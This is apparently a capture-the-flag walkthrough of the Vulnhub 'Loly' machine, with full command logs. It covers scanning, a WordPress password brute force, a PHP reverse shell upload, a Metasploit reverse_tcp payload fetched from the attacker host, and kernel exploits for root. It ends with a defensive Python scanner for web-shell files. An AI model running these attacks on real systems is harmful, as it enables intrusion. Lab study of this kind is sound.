Loly
Identifying the target host's IP address
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Loly]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: 192.168.56.0/24 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:11 1 60 Unknown vendor
192.168.56.100 08:00:27:64:18:1b 1 60 PCS Systemtechnik GmbH
192.168.56.251 08:00:27:ff:d3:51 1 60 PCS Systemtechnik GmbH
Using the netdiscover tool on Kali Linux, the target host's IP address is identified as 192.168.56.251
NMAP scan
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Loly]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.251 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2023-04-09 23:41 EDT
Nmap scan report for bogon (192.168.56.251)
Host is up (0.00015s latency).
Not shown: 65534 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http nginx 1.10.3 (Ubuntu)
|_http-title: Welcome to nginx!
|_http-server-header: nginx/1.10.3 (Ubuntu)
MAC Address: 08:00:27:FF:D3:51 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.23 seconds
The NMAP scan shows that the target host has 1 open port: 80 (http)
Getting a shell
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Loly]
└─$ curl http://192.168.56.251/robots.txt
<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/1.10.3 (Ubuntu)</center>
</body>
</html>
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Loly]
└─$ nikto -h http://192.168.56.251
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.251
+ Target Hostname: 192.168.56.251
+ Target Port: 80
+ Start Time: 2023-04-09 23:43:02 (GMT-4)
---------------------------------------------------------------------------
+ Server: nginx/1.10.3 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ nginx/1.10.3 appears to be outdated (current is at least 1.14.0)
+ 7915 requests: 0 error(s) and 4 item(s) reported on remote host
+ End Time: 2023-04-09 23:43:23 (GMT-4) (21 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
Next, use the gobuster tool to enumerate the target host's directories
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Loly]
└─$ gobuster dir -u http://192.168.56.251 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt,.js,.sh
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.251
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.5
[+] Extensions: php,html,txt,js,sh
[+] Timeout: 10s
===============================================================
2023/04/09 23:44:01 Starting gobuster in directory enumeration mode
===============================================================
/wordpress (Status: 301) [Size: 194] [--> http://192.168.56.251/wordpress/]
Gobuster identifies the /wordpress directory. Visiting it, the page renders incompletely; the page source shows that the hostname is loly.lc, so add it to the /etc/hosts file
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Loly]
└─$ sudo vim /etc/hosts
[sudo] password for kali:
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Loly]
└─$ cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
192.168.56.251 loly.lc
After refreshing, the page displays normally; the target site's CMS is WordPress
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Loly]
└─$ wpscan --url http://192.168.56.251/wordpress -e u,p
_______________________________________________________________
wpscan finds the username loly; can its password be cracked?
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Loly]
└─$ wpscan --url http://192.168.56.251/wordpress -U loly -P /usr/share/wordlists/rockyou.txt
[!] Valid Combinations Found:
| Username: loly, Password: fernando
This yields the username and password for the WordPress admin backend:
username: loly
password: fernando
Log into the WordPress admin backend successfully.
Compress the shell.php file into a zip and it can be uploaded successfully.
The upload location is stated in Settings: under banners in
/var/www/html/wordpress/wp-content/
http://192.168.56.251/wordpress/wp-content/banners/shell.php
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Loly]
└─$ sudo nc -nlvp 5555
[sudo] password for kali:
listening on [any] 5555 ...
connect to [192.168.56.230] from (UNKNOWN) [192.168.56.251] 54578
Linux ubuntu 4.4.0-31-generic #50-Ubuntu SMP Wed Jul 13 00:07:12 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
05:05:16 up 25 min, 0 users, load average: 0.00, 0.01, 0.09
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ which python
$ which python3
/usr/bin/python3
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@ubuntu:/$ cd /home
cd /home
www-data@ubuntu:/home$ ls -alh
ls -alh
total 12K
drwxr-xr-x 3 root root 4.0K Aug 19 2020 .
drwxr-xr-x 22 root root 4.0K Aug 19 2020 ..
drwxr-xr-x 2 loly loly 4.0K Aug 20 2020 loly
www-data@ubuntu:/home$ cd loly
cd loly
www-data@ubuntu:/home/loly$ ls -alh
ls -alh
Privilege escalation
www-data@ubuntu:~/html/wordpress$ cat wp-config.php
cat wp-config.php
<?php
/**
* The base configuration for WordPress
*
* The wp-config.php creation script uses this file during the
* installation. You don't have to use the web site, you can
* copy this file to "wp-config.php" and fill in the values.
*
* This file contains the following configurations:
*
* * MySQL settings
* * Secret keys
* * Database table prefix
* * ABSPATH
*
* @link https://wordpress.org/support/article/editing-wp-config-php/
*
* @package WordPress
*/
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'wordpress' );
/** MySQL database username */
define( 'DB_USER', 'wordpress' );
/** MySQL database password */
define( 'DB_PASSWORD', 'lolyisabeautifulgirl' );
Could this be loly's password? Trying it proves it correct.
www-data@ubuntu:~/html/wordpress$ su - loly
su - loly
Password: lolyisabeautifulgirl
loly@ubuntu:~$
loly@ubuntu:~$ id
id
uid=1000(loly) gid=1000(loly) groups=1000(loly),4(adm),24(cdrom),30(dip),46(plugdev),114(lpadmin),115(sambashare)
The next step is to upgrade to meterpreter; on Kali Linux, generate the payload with the msfvenom command
$ msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.56.230 LPORT=6666 -f elf -o escalate.elf
Then upload escalate.elf to the target host and make it executable
loly@ubuntu:/tmp$ wget http://192.168.56.230:8000/escalate.elf
wget http://192.168.56.230:8000/escalate.elf
--2023-04-10 05:16:22-- http://192.168.56.230:8000/escalate.elf
Connecting to 192.168.56.230:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 207 [application/octet-stream]
Saving to: ‘escalate.elf’
escalate.elf 100%[===================>] 207 --.-KB/s in 0s
2023-04-10 05:16:22 (69.4 MB/s) - ‘escalate.elf’ saved [207/207]
loly@ubuntu:/tmp$ chmod +x escalate.elf
chmod +x escalate.elf
Then start msfconsole on Kali Linux and run exploit/multi/handler; note that the payload must match the one used in the earlier msfvenom command
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (linux/x86/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf6 exploit(multi/handler) > set LHOST 192.168.56.230
LHOST => 192.168.56.230
msf6 exploit(multi/handler) > set LPORT 6666
LPORT => 6666
msf6 exploit(multi/handler) > run
Run escalate.elf on the target host, and a meterpreter session is obtained on Kali Linux
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.56.230:6666
[*] Sending stage (989032 bytes) to 192.168.56.251
[*] Meterpreter session 1 opened (192.168.56.230:6666 -> 192.168.56.251:38704) at 2023-04-10 00:17:37 -0400
meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > search suggester
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 post/multi/recon/local_exploit_suggester normal No Multi Recon Local Exploit Suggester
Interact with a module by name or index. For example info 0, use 0 or use post/multi/recon/local_exploit_suggester
msf6 exploit(multi/handler) > use post/multi/recon/local_exploit_suggester
msf6 post(multi/recon/local_exploit_suggester) > show options
Module options (post/multi/recon/local_exploit_suggester):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on
SHOWDESCRIPTION false yes Displays a detailed description for the available exploits
msf6 post(multi/recon/local_exploit_suggester) > set SESSION 1
SESSION => 1
msf6 post(multi/recon/local_exploit_suggester) > run
Based on the suggester's recommendations, pick one of the vulnerabilities for privilege escalation
msf6 post(multi/recon/local_exploit_suggester) > use exploit/linux/local/af_packet_chocobo_root_priv_esc
[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/local/af_packet_chocobo_root_priv_esc) > show options
Module options (exploit/linux/local/af_packet_chocobo_root_priv_esc):
Name Current Setting Required Description
---- --------------- -------- -----------
COMPILE Auto yes Compile on target (Accepted: Auto, True, False)
SESSION yes The session to run this module on
TIMEOUT 600 yes Race timeout (seconds)
Payload options (linux/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.0.2.15 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Auto
msf6 exploit(linux/local/af_packet_chocobo_root_priv_esc) > set LHOST 192.168.56.230
LHOST => 192.168.56.230
msf6 exploit(linux/local/af_packet_chocobo_root_priv_esc) > set LPORT 8888
LPORT => 8888
msf6 exploit(linux/local/af_packet_chocobo_root_priv_esc) > set SESSION 1
SESSION => 1
msf6 exploit(linux/local/af_packet_chocobo_root_priv_esc) > run
[*] Started reverse TCP handler on 192.168.56.230:8888
[*] Running automatic check ("set AutoCheck false" to disable)
[-] Failed to open file: /proc/sys/user/max_user_namespaces: core_channel_open: Operation failed: 1
[+] The target appears to be vulnerable.
[*] Writing '/tmp/.9OOijSlS2' (250 bytes) ...
[*] Launching exploit (Timeout: 600)...
id
[*] Sending stage (3020772 bytes) to 192.168.56.251
[*] Cleaning up /tmp/.9OOijSlS2 and /tmp/.Byr5rm0b..
[*] Meterpreter session 2 opened (192.168.56.230:8888 -> 192.168.56.251:34214) at 2023-04-10 00:22:57 -0400
[-] Exploit failed: Rex::Post::Meterpreter::RequestError stdapi_fs_delete_file: Operation failed: 1
[*] Exploit completed, but no session was created.
msf6 exploit(linux/local/af_packet_chocobo_root_priv_esc) >
msf6 exploit(linux/local/af_packet_chocobo_root_priv_esc) > id
[*] exec: id
uid=1000(kali) gid=1000(kali) groups=1000(kali),4(adm),20(dialout),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),109(netdev),115(bluetooth),125(scanner),141(wireshark),143(kaboxer),144(vboxsf)
msf6 exploit(linux/local/af_packet_chocobo_root_priv_esc) > use exploit/linux/local/bpf_sign_extension_priv_esc
[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/local/bpf_sign_extension_priv_esc) > show options
Module options (exploit/linux/local/bpf_sign_extension_priv_esc):
Name Current Setting Required Description
---- --------------- -------- -----------
COMPILE Auto yes Compile on target (Accepted: Auto, True, False)
SESSION yes The session to run this module on
Payload options (linux/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.0.2.15 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Auto
msf6 exploit(linux/local/bpf_sign_extension_priv_esc) > set LHOST 192.168.56.230
LHOST => 192.168.56.230
msf6 exploit(linux/local/bpf_sign_extension_priv_esc) > set LPORT 8888
LPORT => 8888
msf6 exploit(linux/local/bpf_sign_extension_priv_esc) > set SESSION 1
SESSION => 1
msf6 exploit(linux/local/bpf_sign_extension_priv_esc) > run
[*] Started reverse TCP handler on 192.168.56.230:8888
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Writing '/tmp/.nwp6qQh5' (250 bytes) ...
[*] Launching exploit ...
[*] Sending stage (3020772 bytes) to 192.168.56.251
[*] Cleaning up /tmp/.nwp6qQh5 and /tmp/.mPFqG0 ...
[*] Meterpreter session 3 opened (192.168.56.230:8888 -> 192.168.56.251:34216) at 2023-04-10 00:23:39 -0400
meterpreter > shell
Process 20943 created.
Channel 1 created.
id
uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),30(dip),46(plugdev),114(lpadmin),115(sambashare),1000(loly)
cd /root
ls -alh
total 32K
drwx------ 3 root root 4.0K Apr 10 04:38 .
drwxr-xr-x 22 root root 4.0K Aug 19 2020 ..
-rw------- 1 root root 1.6K Aug 20 2020 .bash_history
-rw-r--r-- 1 root root 3.1K Oct 22 2015 .bashrc
drwxr-xr-x 2 root root 4.0K Apr 10 04:38 .nano
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-rw-r--r-- 1 root root 75 Aug 20 2020 .selected_editor
-rw-r--r-- 1 root root 266 Aug 19 2020 root.txt
cat root.txt
____ ____ ____ ____
/ ___| _ _ _ __ / ___/ ___|| _ \
\___ \| | | | '_ \| | \___ \| |_) |
___) | |_| | | | | |___ ___) | _ <
|____/ \__,_|_| |_|\____|____/|_| \_\
Congratulations. I'm BigCityBoy
At this point privilege escalation succeeded and the root flag was obtained
Lessons learned
- After uploading the shell.php.zip file, some patience is needed to locate where the file ends up
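From the defender's side, the upload step and the lesson about locating shell.php.zip point at the same control: PHP files should not appear under wp-content outside plugins/themes/mu-plugins, least of all in a banners/ directory. The following Python is an added example, not code from the original writeup; the expected-directory list, the shell heuristics, and the sample wp-content tree are constructed assumptions for illustration.

```python
import re
import tempfile
from pathlib import Path

# Directories under wp-content where PHP code is normally expected (assumption).
EXPECTED_PHP_DIRS = {"plugins", "themes", "mu-plugins"}

# Heuristic indicators of command execution / obfuscation (assumed, not exhaustive).
SUSPICIOUS_PATTERNS = [
    re.compile(rb"\b(exec|shell_exec|passthru|system|popen|proc_open)\s*\("),
    re.compile(rb"\bfsockopen\s*\("),
    re.compile(rb"\bbase64_decode\s*\("),
    re.compile(rb"\$_(GET|POST|REQUEST|COOKIE)\s*\["),
]

def scan_wp_content(wp_content: str) -> list[dict]:
    """Report every .php file under wp-content that is misplaced (outside the
    expected directories, e.g. banners/ or uploads/) or matches shell heuristics."""
    root = Path(wp_content)
    findings = []
    for path in root.rglob("*.php"):
        rel = path.relative_to(root)
        top = rel.parts[0] if len(rel.parts) > 1 else ""
        misplaced = top not in EXPECTED_PHP_DIRS
        data = path.read_bytes()
        hits = [p.pattern.decode() for p in SUSPICIOUS_PATTERNS if p.search(data)]
        if misplaced or hits:
            findings.append({"path": rel.as_posix(), "misplaced": misplaced, "indicators": hits})
    return findings

def build_demo_tree() -> str:
    """Create a constructed wp-content tree in a temp dir (sample data, not from the box)."""
    base = Path(tempfile.mkdtemp(prefix="wp-content-"))
    files = {
        "themes/twentytwenty/functions.php": b"<?php add_action('init', 'demo_init');\n",
        "plugins/akismet/akismet.php": b"<?php // legitimate plugin bootstrap\n",
        "banners/shell.php": b"<?php /* constructed sample */ echo shell_exec('id'); ?>\n",
        "uploads/2020/08/photo.php": b"<?php eval(base64_decode($d)); ?>\n",
    }
    for rel, content in files.items():
        target = base / rel
        target.parent.mkdir(parents=True, exist_ok=True)
        target.write_bytes(content)
    return str(base)

def demo() -> dict[str, dict]:
    """Scan the constructed tree and index findings by relative path."""
    return {f["path"]: f for f in scan_wp_content(build_demo_tree())}

if __name__ == "__main__":
    for path, f in demo().items():
        print(f"{path}: misplaced={f['misplaced']} indicators={f['indicators']}")
```

Run it periodically (or from a file-integrity monitor) against the real wp-content path; a hit in banners/ or uploads/ is exactly the artefact this box's upload left behind.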